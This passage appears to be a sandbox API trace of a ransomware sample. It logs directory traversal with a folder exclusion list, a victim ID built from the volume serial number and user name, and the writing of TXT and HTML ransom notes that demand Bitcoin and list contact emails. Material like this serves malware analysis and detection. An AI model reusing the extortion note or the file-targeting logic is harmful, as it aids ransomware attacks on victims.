	[0170.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="program files") returned 0x0
	[0170.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="appdata") returned 0x0
	[0170.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="application data") returned 0x0
	[0170.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="winnt") returned 0x0
	[0170.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="tmp") returned 0x0
	[0170.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="cache") returned 0x0
	[0170.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="webcache") returned 0x0
	[0170.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="inetcache") returned 0x0
	[0170.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="nvidia") returned 0x0
	[0170.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.803] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="packages") returned 0x0
	[0170.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.803] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="cookies") returned 0x0
	[0170.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.803] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="programdata") returned 0x0
	[0170.803] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.803] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0170.804] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.804] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.804] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections"
	[0170.804] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*"
	[0170.805] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.805] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.805] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HELP_DECRYPT_YOUR_FILES.TXT") returned 76
	[0170.805] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.855] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.855] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.858] CloseHandle (hObject=0x388) returned 1
	[0170.858] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.859] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0170.861] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.861] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.862] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.862] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.862] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0170.862] CloseHandle (hObject=0x388) returned 1
	[0170.863] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.863] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.863] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.863] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HELP_DECRYPT_YOUR_FILES.HTML") returned 77
	[0170.863] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.864] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.864] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0170.867] CloseHandle (hObject=0x388) returned 1
	[0170.867] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.868] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.868] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0170.870] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.870] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.871] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.871] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.871] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0170.871] CloseHandle (hObject=0x388) returned 1
	[0170.872] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f5eef06, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.872] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*") returned 52
	[0170.872] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.872] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\network\\connections\\*.*") returned 0x34
	[0170.872] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.873] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="windows") returned 0x0
	[0170.873] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.873] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="boot") returned 0x0
	[0170.873] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.873] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="system volume information") returned 0x0
	[0170.873] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.873] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.874] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="temp") returned 0x0
	[0170.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.874] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="program files") returned 0x0
	[0170.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.874] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.874] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="appdata") returned 0x0
	[0170.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.875] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="application data") returned 0x0
	[0170.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.875] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="winnt") returned 0x0
	[0170.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.875] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="tmp") returned 0x0
	[0170.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.876] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="cache") returned 0x0
	[0170.876] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.876] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.876] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.876] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="webcache") returned 0x0
	[0170.876] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.876] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="inetcache") returned 0x0
	[0170.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.877] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="nvidia") returned 0x0
	[0170.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.877] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="packages") returned 0x0
	[0170.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.877] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="cookies") returned 0x0
	[0170.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.878] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="programdata") returned 0x0
	[0170.878] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.878] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.878] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f5eef06, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.878] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.878] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f5eef06, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f5eef06, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f6152ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.878] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f5eef06, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f5eef06, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f5eef06, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.878] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f5eef06, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f5eef06, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f5eef06, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0170.878] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.879] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.879] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1
	[0170.879] lstrcmpW (lpString1="Downloader", lpString2="..") returned 1
	[0170.879] lstrcmpW (lpString1="Downloader", lpString2=".") returned 1
	[0170.879] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network"
	[0170.880] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\"
	[0170.880] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\", lpString2="Downloader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader"
	[0170.880] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader"
	[0170.880] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\"
	[0170.880] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\"
	[0170.880] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*"
	[0170.880] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.881] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 51
	[0170.881] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.881] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\network\\downloader\\*.*") returned 0x33
	[0170.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.881] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="windows") returned 0x0
	[0170.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.882] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="boot") returned 0x0
	[0170.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.882] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="system volume information") returned 0x0
	[0170.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.882] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.882] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="temp") returned 0x0
	[0170.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.883] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="program files") returned 0x0
	[0170.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.883] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.883] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="appdata") returned 0x0
	[0170.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.884] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="application data") returned 0x0
	[0170.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.884] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="winnt") returned 0x0
	[0170.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.151] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="tmp") returned 0x0
	[0171.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.152] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="cache") returned 0x0
	[0171.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.152] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.152] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="webcache") returned 0x0
	[0171.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="inetcache") returned 0x0
	[0171.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="nvidia") returned 0x0
